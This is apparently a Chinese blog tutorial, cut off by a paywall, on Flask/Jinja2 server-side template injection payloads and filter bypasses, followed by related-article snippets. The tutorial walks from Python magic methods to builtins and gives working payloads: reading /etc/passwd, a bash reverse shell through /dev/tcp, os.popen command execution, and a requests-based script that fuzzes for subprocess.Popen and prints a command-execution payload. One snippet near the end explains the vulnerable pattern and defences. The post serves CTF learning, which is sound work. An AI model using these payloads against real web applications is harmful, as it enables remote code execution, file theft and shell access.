SSTI漏洞学习(下)——Flask/Jinja模板引擎的相关绕过

最新推荐文章于 2024-10-27 22:19:18 发布
原创 最新推荐文章于 2024-10-27 22:19:18 发布 · 1.2k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞 #编程语言 #安全漏洞 #web

本文详细介绍了如何在Python中寻找SSTI攻击载荷,包括通过魔术方法获取基本类、重载__init__方法、利用Flask/Jinja模块绕过限制,以及各种技巧和绕过手段,如字符串表示法、字典操作、对象元素获取和请求注入。

0x01 再看寻找Python SSTI攻击载荷的过程

获取基本类

对于返回的是定义的Class内的话:
__dict__   //返回类中的函数和属性,父类子类互不影响
__base__ //返回类的父类 python3
__mro__ //返回类继承的元组,(寻找父类) python3
__init__ //返回类的初始化方法   
__subclasses__()  //返回类中仍然可用的引用  python3
__globals__  //对包含函数全局变量的字典的引用 python3
对于返回的是类实例的话:
__class__ //返回实例的对象,可以使类实例指向Class,使用上面的魔术方法

''.__class__.__mro__[2]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]

此外,在引入了Flask/Jinja的相关模块后还可以通过

config
request
url_for
get_flashed_messages
self
redirect

等获取基本类,

获取基本类后,继续向下获取基本类(object)的子类

object.__subclasses__()

找到重载过的__init__

在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的

也可以利用.index()去找file,warnings.catch_warnings

>>> ''.__class__.__mro__[2].__subclasses__()[99].__init__
<slot wrapper '__init__' of 'object' objects>
>>> ''.__class__.__mro__[2].__subclasses__()[59].__init__
<unbound method WarningMessage.__init__>

查看其引用__builtins__

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']

这里会返回dict类型,寻找keys中可用函数,直接调用即可,使用keys中的file等函数来实现读取文件的功能

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()

常用的目标函数有这么几个

file
subprocess.Popen
os.popen
exec
eval

常用的中间对象有这么几个

catch_warnings.__init__.func_globals.linecache.os.popen('bash -i >& /dev/tcp/127.0.0.1/233 0>&1')
lipsum.__globals__.__builtins__.open("/flag").read()
linecache.os.system('ls')

更多的可利用类可以通过遍历筛选的方式找到

比如对subprocess.Popen我们可以构造如下fuzz脚本

import requests

url = ""

index = 0
for i in range(100, 1000):
    #print i
    payload = "{
  
  {''.__class__.__mro__[2].__subclasses__()[%d]}}" % (i)
    params = {
        "search": payload
    }
    #print(params)
    req = requests.get(url,params=params)
    #print(req.text)
    if "subprocess.Popen" in req.text:
        index = i
        break


print("index of subprocess.Popen:" + str(index))
print("payload:{
  
  {''.__class__.__mro__[2].__subclasses__()[%d]('ls',shell=True,stdout=-1).communicate()[0].strip()}}" % i)

那么我们也可以利用{

最低0.47元/天 解锁文章
Flask模板注入编码姿势绕过-CMCTF
as you know, nlp is fantasitc!
04-25 1192
写在前面:通过这次比赛学到flask模板注入几个比较sao的绕过姿势 参考文章如下 ctf中flaskssti xctf高校网络安全挑战赛-华为云专场的MINE2 1、参考MINE2这道题目的一些过滤方法,以及一些替代方法 2、主要是利用attr获得属性,一些其他的编码方式如十六进制编码绕过,unicode编码绕过,格式化字符串绕过以及上面图片中提到的十六进制转字符串绕过 格式化字符串绕过payload ?msg={% print(session|attr("__init__"))|attr("__
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 2万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
最全SSTI模板注入waf绕过总结(6700+字数!)
2301_76690905的博客
11-09 9264
详细介绍了各种方法绕过混合过滤,关键字过滤,各种符号过滤,点过滤,下划线过滤,单双引号过滤,很齐全
SSTI注入WAF绕过
zkaq7777777的博客
06-03 1458
SSTI,其中文名为服务端模板注入。首先我们需要先了解一下:什么是模板引擎模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。
SSTI模块注入SSTI+Flask+Python(下):绕过过滤
07-25 3466
SSTI绕过过滤
SSTI漏洞学习(下)——Flask_Jinja模板引擎相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎相关绕过SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
SSTI模板注入基础(Flask+Jinja2)
qq_55202378的博客
12-22 2432
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。由于python一切皆对象的特性,函数本质上也是对象,也存在类中的一些内置方法和内置属性,所以我们可以执行接下来的操作。是类中的一个内置属性,值是该实例的对应的类。
Flask服务端模板(Jinja2)注入漏洞(SSTI)复现
又菜又爱倒腾的博客
10-29 1737
#Flask服务端模板(Jinja2)注入漏洞(SSTI)复现# 一、漏洞简介 服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板Web应用可以把输入转换成特定的HTML文件或者email格式。 二、漏洞影响 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Flask模块中几乎都存在注入漏洞。 三、产生原因 from
FlaskJinja2)服务端模板注入漏洞SSTI)整理
qq_46145027的博客
04-19 2302
整理一下Flask框架下的SSTI漏洞相关知识
关于SSTI模块注入的常见绕过方法
Welcome To Myon'Blog !
07-05 2643
1、过滤了中括号 2、过滤了双下划线 3、过滤了单下划线 4、过滤了点 5、过滤了大括号 6、过滤了引号 7、过滤了数字
SSTI注入绕过-Jinjia2模板
fatmoForE
11-29 760
题目选自NCTF2020的Master 源码如下: from jinja2 import Template from flask import Flask,request app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') blacklist = ['%', '-', ':', '+', 'class', 'base', 'mro', '_', 'con
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过(ctfshow web入门370)
你们de4月天的博客
03-30 2102
ctfshow web入门370 中括号、args、request、下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
SSTI模板注入-常用的一些绕过
九尾ww的博客
10-27 680
漏洞成因:服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式 1.过滤[]等括号 使用gititem绕过。如原poc {{"".class.bases[0]}} 绕过后{{"".class.bases.getitem(0)}}
SSTI漏洞利用及绕过总结(绕过姿势多样)
永不落的梦想
07-15 5579
SSTI模板注入,详细的常用注入模块利用,全面的SSTI绕过总结
jinja2模板注入_Flask/Jinja2模板注入中的一些绕过姿势
weixin_36329818的博客
01-17 438
转自 https://p0sec.net/index.php/archives/120/好长时间没更新过了,ssti也不是新东西,打国赛半决赛,简直是demo全家桶,ssti必然是遇到不少。很多东西只是保存在收藏栏里,用的时候再查很浪费时间,记录一下,遇到时也能顺手一点。0x00 获取基本类首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2...
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 1167
在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
六、SSTI模板注入绕过
黑日里不灭的light
10-20 532
解释:SSTI(Server-Side Template Injection)是一种在服务器端模板注入恶意代码的攻击技术。它利用了模板引擎漏洞,使攻击者能够将恶意代码插入到模板中,在服务器端执行这些代码,例如python的flask就存在容易出现这个问题。危害:代码执行:攻击者可以通过SSTI注入在服务器端执行任意代码,包括命令执行、远程文件包含等攻击。这可能导致服务器被完全控制,进一步导致数据泄漏、服务器崩溃或恶意操作。
SSTI-payload和各种绕过方法
qq_44418229的博客
07-25 2250
SSTI总结:流程和绕过
网络安全最新SSTI模板注入详细总结及WAF绕过_fenjing ssti(2),腾讯3轮面试都问了网络安全事件分发
2401_84545016的博客
05-10 491
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
jinja2模板ssti漏洞
最新发布
01-18
### Jinja2 模板 SSTI 漏洞原理 Jinja2 是一种广泛使用的 Python 模板引擎,允许开发者通过模板文件动态生成 HTML 页面或其他类型的文本输出。然而,在某些情况下,如果应用程序未能正确处理用户输入并将其传递给模板引擎,则可能导致服务器端模板注入 (SSTI) 漏洞。 当存在 SSTI 漏洞时,攻击者可以向 Web 应用程序发送恶意构造的数据作为参数或 URL 查询字符串的一部分。这些数据随后被嵌入到模板上下文中执行[^1]。由于 Jinja2 支持丰富的表达式语法以及访问 Python 对象的能力,一旦成功触发 SSTI,攻击者可能获得对整个应用环境甚至底层操作系统的完全控制权限。 #### 示例代码展示潜在风险: ```python from flask import Flask, render_template_string app = Flask(__name__) @app.route('/unsafe/<string:name>') def unsafe(name): template = f'Hello {name}' # 用户可控的内容直接拼接到模板中 return render_template_string(template) if __name__ == '__main__': app.run(debug=True) ``` 上述例子展示了不安全的做法——未经验证就将来自用户的 `name` 参数值插入到了模板字符串里。这使得任何能够影响此路由请求的人都有机会尝试注入有害指令来操纵响应内容[^3]。 ### 防御措施建议 为了防止此类漏洞的发生,应当遵循以下最佳实践原则: - **避免直接使用不可信源提供的模板片段**:永远不要让用户提交完整的模板代码;只接受预定义好的占位符名称,并严格限定其作用范围。 - **启用沙盒模式**:对于确实需要支持一定程度自定义化的场景下,可以通过配置开启 Jinja2 的 sandboxed environment 功能,从而限制可调用函数集和属性访问路径。 - **过滤特殊字符**:确保所有外部传入的信息都经过适当转义处理后再参与最终页面构建过程,特别是那些用于构成条件判断、循环结构等逻辑部分的关键字。 - **定期审查依赖库版本更新日志**:及时跟进官方发布的补丁信息,修补已知的安全隐患。 综上所述,虽然 SSTI 可能带来严重的后果,但只要采取合理的预防手段就能有效降低遭受攻击的风险。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AI小模型

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值